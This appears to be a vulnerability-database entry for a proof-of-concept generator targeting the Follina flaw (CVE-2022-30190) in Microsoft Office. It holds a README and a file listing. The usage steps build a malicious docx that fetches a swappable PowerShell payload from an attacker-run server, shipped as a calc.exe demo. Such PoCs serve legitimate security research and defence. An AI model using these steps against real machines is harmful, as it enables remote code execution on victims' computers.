Related vulnerability

Description
MS-MSDT Follina CVE-2022-30190 PoC document generator

Introduction
# MS-MSDT Follina CVE-2022-30190 PoC
Malicious docx generator to exploit CVE-2022-30190 (Microsoft Office Word Remote Code Execution).

This script is based on the [CVE-2021-40444 PoC by LockedByte](https://github.com/lockedbyte/CVE-2021-40444) and the [writeup by Tothi](https://gist.github.com/tothi/66290a42896a97920055e50128c9f040).
# Usage
First, modify `backup.html` and replace the PowerShell payload. As shipped, it just launches `calc.exe` using `IEX('calc.exe')`.
`python3 exploit.py generate http://<SRV IP>`

Once you have generated the malicious docx (written to `out/`), you can set up the server:
`sudo python3 exploit.py host 80`

Finally, try the docx in a Windows virtual machine.

File snapshot

 [4.0K]  /data/pocs/1e962f54cc69df09afe70623fec7259d5041fda3
├── [4.0K]  data
│   └── [4.0K]  word_dat
│       ├── [1.4K]  [Content_Types].xml
│       ├── [4.0K]  docProps
│       │   ├── [ 733]  app.xml
│       │   └── [ 745]  core.xml
│       ├── [4.0K]  _rels
│       └── [4.0K]  word
│           ├── [ 14K]  document.xml
│           ├── [2.3K]  fontTable.xml
│           ├── [4.0K]  _rels
│           │   └── [1.2K]  document.xml.rels
│           ├── [2.6K]  settings.xml
│           ├── [ 32K]  styles.xml
│           ├── [4.0K]  theme
│           │   └── [6.9K]  theme1.xml
│           └── [ 603]  webSettings.xml
├── [2.2K]  exploit.py
├── [4.0K]  img
│   ├── [ 46K]  calc.png
│   ├── [ 82K]  gen.png
│   └── [186K]  srv.png
├── [4.0K]  out
│   └── [   1]  0-blank
├── [ 763]  README.md
└── [4.0K]  srv
    ├── [4.5K]  backup.html
    └── [ 11K]  index.html
10 directories, 18 files
                
             
         